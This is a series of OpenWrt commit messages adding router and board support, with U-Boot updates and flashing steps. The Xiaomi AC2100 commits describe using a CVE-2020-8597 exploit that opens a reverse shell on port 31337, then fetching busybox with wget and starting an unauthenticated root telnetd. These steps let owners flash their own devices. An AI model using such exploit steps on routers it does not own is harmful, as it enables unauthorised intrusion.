=> fatload usb 0 0x0800000 initramfs-uImage
=> bootm 0x800000
6. Download sysupgrade image and perform sysupgrade.
Based on work ThBexx <>
DTS based on dropped support in 0ebdf0c.
Tested-by: Lech Perczak <>
Reviewed-by: Lech Perczak <>
Signed-off-by: Pawel Dembicki <>
[NSA310s -> NSA310S in DEVICE_MODEL]
Signed-off-by: Petr Štetiar <>
The Xiaomi Mi Router AC2100 is a *black* cylindrical router that shares many
characteristics (apart from its looks and the GPIO ports) with the 6-antenna
*white* "Xiaomi Redmi Router AC2100"
See the visual comparison of the two routers here:
Specification of R2100:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN in Yellow and Blue
- UART: On board (Don't know where is should be confirmed by anybody else)
- Modified u-boot
Hacking of official firmware process is same at both RM2100 and R2100.
Thanks to @namidairo
Here is the detailed guide Hack:
Guide is written for MacOS but it will work at linux.
needed packages: python3(with scapy), netcat, http server, telnet client
1. Run PPPoE&exploit to get nc and wget busybox, get telnet and wget firmware
2. mtd write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-rootfs0.bin rootfs0
other than these I specified in here. Everything is same with:
Thanks for all community and especially for this device:
@Ilyas @scp07 @namidairo @Percy @thorsten97 @impulse (
MAC Locations:
WAN *:b5 = factory 0xe006
LAN *:b6 = factory 0xe000
WIFI 5ghz *:b8 = factory 0x8004
WIFI 2.4ghz *:b7 = factory 0x0004
Signed-off-by: Emir Efe Kucuk <>
[refactored common image bits into Device/xiaomi-ac2100, fixed From:]
Signed-off-by: Petr Štetiar <>
The RAVPower RP-WD009 is a batter-powered pocket sized router with SD
card lot and USB port.
CPU: MediaTek MT7628AN
FLASH: 16M GigaDevices SPI-NOR
WLAN: MediaTek MT7628AN 2T2R b/g/n
MediaTek MT7610E 1T1R n/ac
ETH: 1x FastEthernet
SD: SD Card slot
USB: USB 2.0
Custom PMIC on the I2C bus (address 0x0a).
1. Press and hold down the reset button.
2. Power up the Device. Keep pressing the reset button for 10
more seconds until the Globe LED lights up.
3. Attach your Computer to the Ethernet port. Assign yourself the
4. Access the recovery page at and upload the OpenWrt
factory image.
5. The flashing will take around 1 minute. The device will reboot
automatically into OpenWrt.
Signed-off-by: David Bauer <>
This reverts commit 930f3c0148.
The build fails with the following build error:
arm-openwrt-linux-muslgnueabi-ld.bfd: drivers/built-in.o: in function `ide_init':
build_dir/target-arm_xscale_musl_eabi/u-boot-nsa310/u-boot-2020.04/drivers/block/ide.c:750: undefined reference to `ide_preinit'
make[4]: *** [Makefile:1700: u-boot] Error 1
Signed-off-by: Hauke Mehrtens <>
the uboot of nsa310 cannot use the network chip
as it is a realtek on the PCIe lanes and not a
Marvell ethernet from the SoC.
Therefore tftp is not possible on this device
and the only way to install is by loading files
from a USB drive.
If the USB subsystem is dead there is no way to
install OpenWrt.
Enable sata support and commands so it can be
used as a fallback in case of USB issues.
Signed-off-by: Alberto Bursi <>
The Netgear WNDRMAC v1 is a hardware variant of the Netgear WNDR3700 v2
* SoC: Atheros AR7161
* RAM: 64mb
* Flash on board: 16mb
* WiFi: Atheros AR9220 (a/n), Atheros AR9223 (b/g/n)
* Ethernet: RealTek RTL8366SR (1xWAN, 4xLAN, Gigabit)
* Power: 12 VDC, 2.5 A
* Full specs on [](
Flash Instructions
It is possible to use the OEM Upgrade page to install the `factory`
variant of the firmware.
After the initial upgrade, you will need to telnet into the router
(default IP to install anything. You may install LuCI
this way. At this point, you will have a web interface to configure
OpenWRT on the WNDRMAC v1.
Please use the `sysupgrade` variant for subsequent flashes.
Recovery Instructions
A TFTP-based recovery flash is possible if the need arises. Please refer
to the WNDR3700 page on for details.
Signed-off-by: Renaud Lepage <>
[update DTSI include name]
Signed-off-by: Adrian Schmutzler <>
The Linksys devices in mvebu target feature a mixed naming,
where parts are based on the official product name (device
node, image; e.g. WRT3200ACM) and parts are based on the
internal code name (DTS file name, compatible, LED labels;
e.g. rango). This inconsistent naming has been perceived
as quite confusing.
A recent attempt by Paul Spooren to harmonize this naming
in kernel has been declined there. However, for us it still
makes sense to apply at least a part of these changes
Primarily, this patch changes the compatible in DTS and thus
the board name used in various scripts to have them in line
with the device, model and image names. Due to the recent
switch from swconfig to DSA, this allows us to drop
SUPPORTED_DEVICES and thus prevent seamless upgrade between
these incompatible setups.
However, this does not include the LED label rename from
Paul's initial patch: I don't think it's worth keeping the
enormous diff locally for this case, as we can implement
this much easier in 01_leds if we have to live with the
inconsistency anyway.
Signed-off-by: Paul Spooren <>
[rebase, extend to all devices, drop DT LED changes]
Signed-off-by: Adrian Schmutzler <>
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN, in Amber and White
- UART: On board near ethernet, opposite side from power
- Modified u-boot
1. Run linked exploit to get shell, startup telnet and wget the files over
2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0
Restore to stock:
1. Setup PXE and TFTP server serving stock firmware image
(See dhcp-boot option of dnsmasq)
2. Hold reset button down before powering on and wait for flashing amber led
3. Release reset button
4. Wait until status led changes from flashing amber to white
This device has dual kernel and rootfs slots like other Xiaomi devices currently
supported (mir3g, etc.) thus, we use the second slot and overwrite the first
rootfs onwards in order to get more space.
Exploit and detailed instructions:
An implementation of CVE-2020-8597 against stock firmware version 1.0.14
This requires a computer with ethernet plugged into the wan port and an active
PPPoE session, and if successful will open a reverse shell to
on port 31337.
As this shell is somewhat unreliable and likely to be killed in a random amount
of time, it is recommended to wget a static compiled busybox binary onto the
device and start telnetd with it.
The stock telnetd and dropbear unfortunately appear inoperable.
(Disabled on release versions of stock firmware likely)
Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox
chmod a+x /tmp/busybox
/tmp/busybox telnetd -l /bin/sh
Tested-by: David Martinez <>
Signed-off-by: Richard Huynh <>
The Linksys EA7500 v2 is advertised as AC1900, but its internal
hardware is AC2600 capable.
SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM: 256M (Nanya NT5CC128M16IP-DI)
FLASH: 128MB NAND (Macronix MX30LF1G18AC-TI)
ETH: 5x 10/100/1000 Mbps Ethernet (MT7530)
- 2.4GHz: 1x MT7615N (4x4:4)
- 5GHz: 1x MT7615N (4x4:4)
- 4 antennas: 3 external detachable antennas and 1 internal
- 1x USB 3.0
- 1x USB 2.0
- 1x Reset button
- 1x WPS button
- 1x White led (Power)
- 6x Green leds (link lan1-lan4, link wan, wps)
- 5x Orange leds (act lan1-lan4, act wan) (working but unmodifiable)
Everything works correctly.
The “factory” openwrt image can be flashed directly from OEM stock
firmware. After the flash the router will reboot automatically.
However, due to the dual boot system, the first installation could fail
(if you want to know why, read the footnotes).
If the flash succeed and you can reach OpenWrt through the web
interface or ssh, you are done.
Otherwise the router will try to boot 3 times and then will
automatically boot the OEM firmware (don’t turn off the router.
Simply wait and try to reach the router through the web interface
every now and then, it will take few minutes).
After this, you should be back in the OEM firmware.
Now you have to flash the OEM Firmware over itself using the OEM web
interface (I tested it using the FW_EA7500v2_2.0.8.194281_prod.img
downloaded from the Linksys website).
When the router reboots flash the “factory” OpenWrt image and this
time it should work.
After the OpenWrt installation you have to use the sysupgrade image
for future updates.
Restore OEM Firmware
After the OpenWrt flash, the OEM firmware is still stored in the
second partition thanks to the dual boot system.
You can switch from OpenWrt to OEM firmware and vice-versa failing
the boot 3 times in a row:
1) power on the router
2) wait 15 seconds
3) power off the router
4) repeat steps 1-2-3 twice more.
5) power on the router and you should be in the “other” firmware
If you want to completely remove OpenWrt from your router, switch to
the OEM firmware and then flash OEM firmware from the web interface
as a normal update.
This procedure will overwrite the OpenWrt partition.
The Linksys EA7500-v2 has a dual boot system to avoid bricks.
This system works using 2 pair of partitions:
1) "kernel" and "rootfs"
2) "alt_kernel" and "alt_rootfs".
After 3 failed boot attempts, the bootloader tries to boot the other
pair of partitions and so on.
This system is managed by the bootloader, which writes a bootcount in
the s_env partition, and if successfully booted, the system add a
"zero-bootcount" after the previous value.
A system update performed from OEM firmware, writes the firmware on the
other pair of partitions and sets the bootloader to boot the new pair
of partitions editing the “boot_part” variable in the bootloader vars.
Effectively it's a quick and safe system to switch the selected boot
Another way to switch the boot partition is:
1) power on the router
2) wait 15 seconds
3) power off the router
4) repeat steps 1-2-3 twice more.
5) power on the router and you should be in the “other” firmware
In this OpenWrt port, this dual boot system is partially working
because the bootloader sets the right rootfs partition in the cmdline
but unfortunately OpenWrt for ramips platform overwrites the cmdline
so is not possible to detect the right rootfs partition.
Because all of this, I preferred to simply use the first pair of
partitions and set read-only the other pair.
However this solution is not optimal because is not possible to know
without opening the case which is the current booted partition.
Let’s take for example a router booting the OEM firmware from the first
pair of partitions. If we flash the OpenWrt image, it will be written
on the second pair. In this situation the router will bootloop 3 times
and then will automatically come back to the first pair of partitions
containg the OEM firmware.
In this situation, to flash OpenWrt correctly is necessary to switch
the booting partition, flashing again the OEM firmware over itself.
At this point the OEM firmware is on both pair of partitions but the
current booted pair is the second one.
Now, flashing the OpenWrt factory image will write the firmware on
the first pair and then will boot correctly.
If this limitation in the ramips platform about the cmdline will be
fixed, the dual boot system can also be implemented in OpenWrt with
almost no effort.
Signed-off-by: Davide Fioravanti <>
Co-Developed-by: Jackson Lim <>
Signed-off-by: Jackson Lim <>
Certain SFP modules (most notably Nokia GPON ones) first check
connectivity on 1000base-x, and switch to 2500base-x afterwards. This
is considered a quirk so the phylink switches the interface to
2500base-x as well.
However, after power-cycling the uDPU device, network interface/SFP module
will not work correctly until the module is re-seated. This patch
resolves this issue by forcing the interface to be brought up in
2500base-x mode by default.
Signed-off-by: Jakov Petrina <>
Signed-off-by: Vladimir Vid <>
Cc: Luka Perkov <>
Update tfa package to latest LSDK-20.04 dropping one patch
which had already been integrated.
Add fixes,
- Remove HIDDEN:=1.
- Move intermediate files installing into Build/InstallDev.
Signed-off-by: Yangbo Lu <>
Update u-boot package to latest LSDK-20.04 dropping patches
which are no longer needed.
Adapt u-boot bootargs to kernel 5.4 for booting.
Signed-off-by: Yangbo Lu <>
We do not have to define package for each board, and
consider variant's building/installing.
It is easier to maintain ls-rcw with only one package
installing all boards RCW binaries as intermediate
files, each of which is just about hundreds of bytes.
Signed-off-by: Yangbo Lu <>
This fixes a bunch of cosmetic issues with GL.iNet GL-MV1000:
- apply alphabetic sorting in multiple files
- use armada-3720 prefix for DTS like for other devices
- fix vendor capitalization for model in DTSes
- remove trivial comment in DTS files
- remove redundant SUPPORTED_DEVICES
- use SOC instead of DEVICE_DTS
- remove empty line at EOF
Fixes: 050c24f05c ("mvebu: add support for GL.iNet GL-MV1000")
Signed-off-by: Adrian Schmutzler <>
Commit 7975060116 ("uboot-rockchip: add new package") has added
`OpenWRT` ident string, fix it to proper `OpenWrt`.
Fixes: 7975060116 ("uboot-rockchip: add new package")
Signed-off-by: Petr Štetiar <>
This is needed to build the uboot-rockchip, needed for the rockchip target
Signed-off-by: Tobias Mädel <>
Tested-by: Tobias Schramm <>
[replaced `mkdir -p` with INSTALL_DIR variable]
Signed-off-by: Petr Štetiar <>
Update U-Boot to current 2020.04 release for kirkwood platform.
Catch up with upstream and move some configuration options from
the header files to the corresponding defconfig files.
Compile tested: all devices
Run tested: nsa310, pogoplugv4
Tested-by: Cezary Jackiewicz <> [nsa310]
Signed-off-by: Pawel Dembicki <>
When open() is called with O_CREAT a 3. parameter has to be given with
the file system permissions of the new file.
Not giving this is an error, which results in a compile error with glibc.
This fixes the following compile error with glibc:
In file included from /include/fcntl.h:329,
from main.c:18:
In function 'open',
inlined from 'rbcfg_update' at main.c:501:7:
/include/bits/fcntl2.h:50:4: error: call to '__open_missing_mode' declared with attribute error: open with O_CREAT or O_TMPFILE in second argument needs 3 arguments
__open_missing_mode ();
Signed-off-by: Hauke Mehrtens <>
Refreshed all patches, run tested on apalis.
Cc: Vladimir Vid <>
Cc: Tim Harvey <>
Cc: Koen Vandeputte <>
Signed-off-by: Petr Štetiar <>
Disable ASLR and filter '-fno-plt' from CFLAGS: solves building when
ASLR enabled by basically disabling ASLR.
Solves errors similar to:
relocation R_X86_64_32S against `.rodata' can not be used when making a PIE object; recompile with -fPIE
module missing GLOBAL_OFFSET_TABLE
Suggested-by: 李国 <>
Acked-by: Petr Štetiar <>
Signed-off-by: Kevin Darbyshire-Bryant <>
Current boot script uses hardcoded bootdevice, which allows booting from
SD card only, so this patch allows booting directly from eMMC as well.
While at it, replace fixed root device with more flexible UUID based
probing, so from now on probing order of MMC device doesn't matter.
Signed-off-by: Petr Štetiar <>
Adding U-Boot image for Olimex A64-Olinuxino eMMC, including patch which
adds eMMC boot partition configuration commands.
Signed-off-by: Petr Štetiar <>
Rename the board as done in upstream commit 268ae6548779 ("sunxi: Rename
Sinovoip BPI M2 Plus to Bananapi M2 Plus H3") which backs the rename
with the following reasoning:
The brand Sinovoip is used for Sinovoip's original VOIP products, while
the Bananapi brand is for the single board computers they produce. This
has been verified by Bananapi. Rename the board from "Sinovoip BPI M2
Plus" to "Bananapi M2 Plus". For the defconfig file, all lowercase is
To support the H5 variant of this board, the "H3" suffix is added to
the defconfig name.
This has to be done in order to allow building U-Boot past v2019.04
release where this change was introduced.
Suggested-by: Pawel Dembicki <>
Signed-off-by: Petr Štetiar <>
U-boot also have defconfig for this board. In 2019.01 branch they are identical.
Signed-off-by: Aleksander Jan Bajkowski <>
Let the grub2 package take care of creating installable grub2 images,
this will allow creating grub2 images without first calling x86 image
generation recipe. Also as side effect, since those images are now
shared, it'll reduce the number of calling grub-mkimage.
Signed-off-by: Tomasz Maciej Nowak <>
[rebase, adjusted commit title]
Signed-off-by: Paul Spooren <>
1. KERNEL_CRASH_DUMP should depends on KERNEL_PROC_KCORE (kexec use it)
2. select crashkernel mem size by totalmem
mem <= 256M disable crashkernel by default
mem >= 4G use 256M for crashkernel
mem >= 8G use 512M for crashkernel
default use 128M
3. set BOOT_IMAGE in kdump.init
4. resolve a "Unhandled rela relocation: R_X86_64_PLT32" error
Tested on x86_64
Signed-off-by: Chen Minqiang <>
Combine fixed sizes of "kernel" and "rootfs" partitions into one
partition managed by OpenWrt splitter, it will allow better management
of chip capacity and less maintenance burden when compiled kernel image
will outgrow allocated size for kernel partition. This also changes kernel
image format, since splitter only manages kernel and rootfs partitions,
the dtb needs to be updated with the kernel, so for convenience, kernel is
packed to FIT image.
Signed-off-by: Tomasz Maciej Nowak <>
This commit replaces UBIFS root partition with squashfs+overlay. It's
preparation for introducing dynamic partitioning.
Signed-off-by: Tomasz Maciej Nowak <>
Re-add support for NXP FRDM-LS1012A, which mimics the flash layout of the
rest boards supported by LSDK.
0x000000000000-0x000000100000 : "bl2"
0x000000100000-0x000000500000 : "fip"
0x000000500000-0x000000600000 : "u-boot-env"
0x000000600000-0x000000a00000 : "reserved-1"
0x000000a00000-0x000000d00000 : "pfe"
0x000000d00000-0x000000f00000 : "reserved-2"
0x000000f00000-0x000001000000 : "dtb"
0x000001000000-0x000002000000 : "kernel"
0x000002000000-0x000004000000 : "ubifs"
SoC: LS1012A single core 800MHz
RAM: 512 MB DDR3
Flash: 64 MB QSPI NOR
Ethernet: 2x 10/100/1000 Mbps
Connectors: µUSB 3.0 OTG
µUSB 2.0 (debugging & power input)
2x 3.5mm jack for microphone & headphone (SGTL5000)
Arduino Shield expansion with I2C, SPI, UART, and GPIO
LEDS: 3x (non-configurable)
Buttons: 1x (reset, non-configurable)
Be advised that erasing or writing 64MB flash takes some time to finish.
Do not reset the board until all operations end with success, otherwise
You'll need external tools to re-program the flash chip.
Follow the QSPI programing procedure for LS1012AFRWY board in
target/linux/layerscape/README, point 3.3.
Don't forget about updating U-Boot environment with MAC addresses of
ethernet interfaces, variable 'ethaddr' for eth0 and 'eth1addr' for eth1.
As the LSDK images do not support sysupgrade, nor do changes in this
commit, it's planed in upcoming submissions.
Signed-off-by: Tomasz Maciej Nowak <>
Also update the U-Boot BSP patch for I2SE Duckbill devices.
Run tested on I2SE Duckbill and Olimex OLinuXino Maxi boards.
Signed-off-by: Michael Heimpold <>
Update U-Boot to latest release, remove `100-wandboard-enable-fit.patch`
as FIT support was added in commit 5b8585825128 ("wandboard: Add FIT
image support").
Rework `110-mx6cuboxi-mmc-fallback.patch` into two patches as there was
new config option `CONFIG_SPL_FORCE_MMC_BOOT` added upstream which
should provide the same functionality as the previous patch hunk.
Moving Apalis towards generic distro_bootcmd.
Cc: Vladimir Vid <>
Cc: Tim Harvey <>
Cc: Koen Vandeputte <>
Signed-off-by: Petr Štetiar <>
This patch support Devolo Magic 2 WIFI, board devolo_dlan2-2400-ac.
This device is a plc wifi AC2400 router/extender with 2 Ethernet
ports, has a PLC and uses LCMP protocol from Home Grid Forum.
SoC: AR9344
CPU: 560 MHz
Flash: 16 MiB (W25Q128JVSIQ)
RAM: 128 MiB DDR2
Ethernet: 2xLAN 10/100/1000
PLC: 88LX5152 (MaxLinear
PLC Uplink: 1Gbps MIMO
PLC Link: RGMII 1Gbps (WAN)
WiFi: Atheros AR9340 2.4GHz 802.11bgn
Atheros AR9882-BR4A 5GHz 802.11ac
Switch: QCA8337, Port0:CPU, Port2:PLC, Port3:LAN1, Port4:LAN2
Button: 3x Buttons (Reset, wifi and plc)
LED: 3x Leds (wifi, plc white, plc red)
GPIO Switch: 11-PLC Pairing (Active Low)
13-PLC Enable
21-WLAN power
MACs Details verified with the stock firmware:
Radio1: 2.4 GHz &wmac *:4c Art location: 0x1002
Radio0: 5.0 GHz &pcie *:4d Art location: 0x5006
Ethernet ðernet *:4e = 2.4 GHz + 2
PLC uplink --- *:4f = 2.4 GHz + 3
Label MAC address is from PLC uplink
OEM SSID: echo devolo-$(grep SerialNumber /dev/mtd1 | grep -o ...$)
OEM WiFi password: grep DlanSecurityID /dev/mtd1|tr -d -|cut -d'=' -f 2
Recommendations: Configure and link your PLC with OEM firmware
BEFORE you flash the device. PLC configuration/link should
remain in different memory and should work straight forward
after flashing.
Restrictions: PLC link detection to trigger plc red led is not
available. PLC chip is not compatible with open-plc-tools,
it uses LCMP protocol with AES-128 and requires different
Notes: Pairing should be possible with gpio switch. Default
configuration will trigger wifi led with 2.4Ghz wifi traffic
and plc white led with wan traffic.
Flash instruction (TFTP):
1. Set PC to fixed ip address
2. Download the sysupgrade image and rename it to uploadfile
3. Start a tftp server with the image file in its root directory
4. Turn off the router
5. Press and hold Reset button
6. Turn on router with the reset button pressed and wait ~15 seconds
7. Release the reset button and after a short time
the firmware should be transferred from the tftp server
8. Allow 1-2 minutes for the first boot.
Signed-off-by: Manuel Giganto <>
This commit ports the device from ar71xx to the ath79 target and
modifies the partition layout.
1. Firmware is installed to nand flash.
2. Modify the uboot-env parameter to boot from the nand flash.
3. The kernel size is extended to 5M.
4.nor flash retains the oem firmware.
oem partition layout
dev: size erasesize name
mtd0: 00040000 00010000 "u-boot"
mtd1: 00010000 00010000 "u-boot-env"
mtd2: 00e30000 00010000 "rootfs"
mtd3: 00170000 00010000 "kernel"
mtd4: 00010000 00010000 "art"
mtd5: 00f90000 00010000 "firmware"
mtd6: 06000000 00020000 "rootfs_data"
mtd7: 02000000 00020000 "backup"
new partition layout
dev: size erasesize name
mtd0: 00040000 00010000 "u-boot"
mtd1: 00010000 00010000 "u-boot-env"
mtd2: 00fa0000 00010000 "oem-firmware"
mtd3: 00010000 00010000 "art"
mtd4: 00500000 00020000 "kernel"
mtd5: 05b00000 00020000 "ubi"
mtd6: 02000000 00020000 "oem-backup"
MAC address overview:
All mac addresses are stored in the art partition.
eth0: 0x0
eth1: 0x6
ath9k: 0xc
ath10k: 0x12
No valid addresses in 0x1002 and 0x5006. All addresses match the OEM
Install from oem firmware.
Enable ssh service:
Connect to the router web, click professional, click system-startup,
and add dropbear in the local startup input box. Click
system-administration, delete ssh-key, and replace your ssh pub key.
Restart the router.
1.Upload openwrt firmware to the device
scp openwrt-snapshot-r11365-df60a0852c-ath79-nand-domywifi_dw33d-\
squashfs-factory.bin root@
2.modify uboot-env.
ssh login to the device:
fw_setenv bootcmd 'nboot 0x8050000 0;bootm || bootm 0x9fe80000'
Run the fw_printenv command to check if the settings are correct.
3.Write openwrt firmware.
ssh login to the device:
mtd -r write /tmp/openwrt-snapshot-r11365-df60a0852c-ath79-nand-\
domywifi_dw33d-squashfs-factory.bin /dev/mtd6
The device will restart automatically and the openwrt firmware
installation is complete.
Restore oem firmware.just erase the kernel partition and the ubi
ssh login to the device:
mtd erase /dev/mtd4
mtd -r erase /dev/mtd5
Reboot the device
Signed-off-by: WeiDong Jia <>
[alter flash instruction in commit message]
Signed-off-by: Chuanhong Guo <>
Currently bootloader always stays on the same version as when first
written to boot medium (not true if partition layout changed, which will
trigger sysupgrade process to write full disk image). That creates
inconveniences as it always stays with same features or/and bugs. Users
wishing to add support to additional modules or new version, would need
to write the whole image, potentially destroying previous system
configuration. To fix these, this commit adds additional routine to
sysupgrade which upgrades unconditionally the bootloader to the latest
state provided by OpenWrt.
Signed-off-by: Tomasz Maciej Nowak <>
The BUILD_VARIANT might differ from UBOOT_CONFIG, so point to a file we
are actually changing. Being here let's call 'Build/Configure/U-Boot'
definition, instead of definig the same command. This'll be more future
proof, if U-Boot configuration procedure will change.
Signed-off-by: Tomasz Maciej Nowak <>
The current version of ATF does not support power off for SGMII
COMPHY. Update to latest ATF to resolve this issue.
Signed-off-by: Scott Roberts <>
Add Netgear WNDR3700v2 to the list of supported boards.
Signed-off-by: Michal Cieslakiewicz <>
[rebase, adjusted commit title]
Signed-off-by: Adrian Schmutzler <>
Add ubootenv uci config for gl-ar150, gl-domino and gl-mifi
Signed-off-by: Kimmo Vuorinen <>
[commit message/title facelift]
Signed-off-by: Adrian Schmutzler <>
In function `main` add calls to `free` for the variable `executable`.
This is needed because the variable `executable` is allocated but
never freed. This cause a memory leak.
Signed-off-by: Andrea Dalla Costa <>
This patch introduces support for Netgear WNDR4500v3. Router
is very similar to WNDR4300v2 and is based on the same PCB.
Information gathered from various Internet sources (including shows following
differences to WNDR4300v2:
* two USB 2.0 ports with separate LEDs
* USB LEDs soldered to secondary pads
* WPS and RFKILL buttons soldered to secondary pads
* described as N900 device with 3x3:3 MIMO for 2.4GHz radio
* power supply requirement is DC 12V 2.5A
* vendor HW ID suffix differs in one digit
* bigger chassis
Signed-off-by: Michal Cieslakiewicz <>
This patch introduces support for Netgear WNDR4300v2.
* Description: Netgear WNDR4300 v2
* Loader: U-boot
* SOC: Qualcomm Atheros QCA9563 (775 MHz)
* RAM: 128 MiB
* Flash: 2 MiB SPI-NOR + 128 MiB SPI-NAND
- NOR: U-boot binary: 256 KiB
- NOR: U-boot environment: 64 KiB
- NOR: ART Backup: 64 KiB
- NOR: Config: 64 KiB
- NOR: Traffic Meter: 64 KiB
- NOR: POT: 64 KiB
- NOR: Reserved: 1408 KiB
- NOR: ART: 64 KiB
- NAND: Firmware: 25600 KiB (see notes for OpenWrt)
- NAND: Language: 2048 KiB
- NAND: mtdoops Crash Dump: 128 KiB
- NAND: Reserved: 103296 KiB
* Ethernet: 5 x 10/100/1000 (4 x LAN, 1 x WAN) (AR8337)
* Wireless:
- 2.4 GHz b/g/n (internal)
- 5 GHz a/n (AR9580)
* USB: yes, 1 x USB 2.0
* Buttons:
- Reset
- WiFi (rfkill)
* LEDs:
- Power (amber/green)
- WAN (amber/green)
- WLAN 2G (green)
- WLAN 5G (blue)
- 4 x LAN (amber/green)
- USB (green)
- WPS (green)
* UART: 4-pin connector JP1, 3.3V (Vcc, TX, RX, GND), 115200 8N1
* Power supply: DC 12V 1.5A
* MAC addresses: LAN=WLAN2G on case label, WAN +1, WLAN5G +2
Important Notes
0. NOR Flash (2 MiB) is not touched by OpenWrt installation.
1. NAND Flash (128 MiB) layout under OpenWrt is changed as follows:
all space is split between 4 MiB kernel and 124 MiB UBI areas;
vendor partitions (language and mtdoops) are removed; kernel space
size can be further expanded if needed; maximum image size is set
to 25600k for compatibility reasons and can also be increased.
2. CPU clock is 775 MHz, not 750 MHz.
3. 5 GHz wireless radio chip is Atheros AR9580-AR1A with bogus PCI
device ID 0xabcd. For ath9k driver to load successfully, this is
overriden in DTS with correct value for this chip, 0x0033.
4. RFKILL button is wired to AR9580 pin 9 which is normally disabled
by chip definition in ath9k code (0x0000F4FF gpio mask). Therefore
'qca,gpio-mask=<0xf6ff>' hack must be used for button to work
5. USB port is always on, no GPIO for 5V power control has been
* TFTP recovery
* TFTP via U-boot prompt
* sysupgrade
* Web interface
Test build configuration
Signed-off-by: Michal Cieslakiewicz <>
This target is still on kernel 4.9, and it looks like there is no
active maintainer for this target anymore.
Remove the code and all the packages which are only used by this target.
To add this target to OpenWrt again port it to a recent and supported
kernel version.
Signed-off-by: Adrian Schmutzler <>
Was inadvertantly missed from the inital forward port from ar71xx to
Fixes: 1588114cf2 ("ath79: add etactica-eg200 support")
Signed-off-by: Karl Palsson <>
[commit description/subject facelift]
Signed-off-by: Petr Štetiar <>
In the rare event a pre-populated fw_env.config exists in the rootfs prior
to firstboot, calling fw_setenv after the system has initialised will
annihilate the devices environment due to two identical lines in
Check for existence prior to blind appendage.
Signed-off-by: Imran Khan <>
Signed-off-by: Daniel Golle <>
[ fixed patch format, improved grep, cosmetics]
Allwinner H3 upto 1.2GHz
8GB on-board eMMC - mountable, can be used as boot with custom boot.scr
microSD-card slot
WiFi 802.11n (AP6212A) - working
Bluetooth (AP6212A) - not working for now
Micro-USB OTG + 2*USB headers
UART 3.3V - working
GPIO/I2C/SPI 2.54mm headers
Standard sunxi SD-card installation procedure - copy image to SD card,
insert in into slot and boot. First time you will need UART adapter to
enable on-board wireless (or just build custom image with enabled WiFi).
To boot from eMMC:
- boot from SD
- copy SD image to emmc (dd bs=... if=.... of=/dev/mmcblk2)
- mount eMMC boot partition and replace boot script on it
- unmount, reboot
To use i2c, spi and more uarts - replace dtb on boot partition with
fixed one (use dtc or fdt-tools).
Signed-off-by: Roman Bazalevsky <>
[rebase onto device name consolidation patches]
Signed-off-by: Adrian Schmutzler <>
This changes device definition to resemble the vendor_device scheme
already present for the majority of device compatible strings.
By doing this, we achieve several advantages at once:
- Image names and node names are more consistent with other targets.
- SUPPORTED_DEVICES can be set automatically for all but two cases.
- Image names and node names are in line with DEVICE_TITLEs.
Signed-off-by: Adrian Schmutzler <>
* add u-boot support for uDPU
* add line to copy u-boot binary to STAGING_DIR_IMAGE, this can later be used
as BL33 variable required for ATF build
* add patch to increase max gunzip size in mvebu_armada-37xx.h which is
required for booting the itb recovery images
Signed-off-by: Vladimir Vid <>
ATF mvebu is required for building a functional bootloader for A7K/A8K and
A37xx platforms. uDPU device is added as the first target.
A3700 platform has a wide range of settings which can be used per device, so
options are defined under the Device sections.
Platform also required WTP (recovery) tools and mv-ddr package for the DDR
topology configuration. 32-bit cross compiler is used for building the WTMI
After the build, flash-image.bin can be used with the bubt command from the
u-boot shell to flash the new version of u-boot.
Signed-off-by: Vladimir Vid <>
All patches have been dropped, they're either redundant (e.g. due to the
new and unset CONFIG_SPL_FAT_WRITE), break compilation (thumb hacks) or
have been applied upstream.
The defconfig for am335x_boneblack has been removed upstream [0], so use
am335x_evm for boneblack too.
Size changes (before, after, file):
ti_am335x-evm and ti_am335x-bone-black:
79804 110832 MLO
623836 756148 u-boot.img
54148 57708 MLO
496272 665728 u-boot.img
39356 40204 MLO
284648 366672 u-boot.img
Tested on boneblack, which has the biggest spl size increase. The beagle and
panda spl sizes seem reasonable to not break booting.
[0] 8fa7f65dd0
Signed-off-by: Andre Heider <>
The GL.iNet GL-AR750S has been supported by the ar71xx and ath79
platforms with access to its 16 MB NOR flash, but not its 128 MB
SPI NAND flash.
This commit provides support for the NAND through the upstream
SPI-NAND framework.
At this time, the OEM U-Boot appears to only support loading the
kernel from NOR. This configuration is preserved as this time,
with the glinet,gl-ar750s-nand name reserved for a potential,
future, NAND-only boot.
The family of GL-AR750S devices on the ath79 platform now includes:
* glinet,gl-ar750m-nor-nand "nand" target
* glinet,gl-ar750m-nor "nand" target (NAND-aware)
NB: This commit increases the kernel size from 2 MB to 4 MB
"Force-less" sysupgrade is presently supported from the current
versions of following NOR-based firmwre images to the version of
glinet,gl-ar750s-nor firmware produced by this commit:
* glinet,gl-ar750s -- OpenWrt 19.07 ar71xx
* glinet,gl-ar750s -- OpenWrt 19.07 ath79
Users who have sucessfully upgraded to glinet,gl-ar750m-nor may then
flash glinet,gl-ar750m-nor-nand with sysupgrade to transtion to the
NAND-based variant.
Other upgrades to these images, including directly to the NAND-based
glinet,gl-ar750s-nor-nand firmware, can be accomplished through U-Boot.
NB: See "ath79: restrict GL-AR750S kernel build-size to 2 MB" which
enables flashing of NAND factory.img with the current GL-iNet U-Boot,
"U-Boot 1.1.4-gcf378d80-dirty (Aug 16 2018 - 07:51:15)"
The GL-AR750S OEM U-Boot allows upload and flashing of either NOR
firmware (sysupgrade.bin) or NAND firmware (factory.img) through its
HTTP-based GUI. Serial connectivity is not required.
The glinet,gl-ar750s-nor and glinet,gl-ar750s-nor-nand images
generated after this commit flash each other directly.
This commit changes the control of the USB VBUS to gpio-hog from
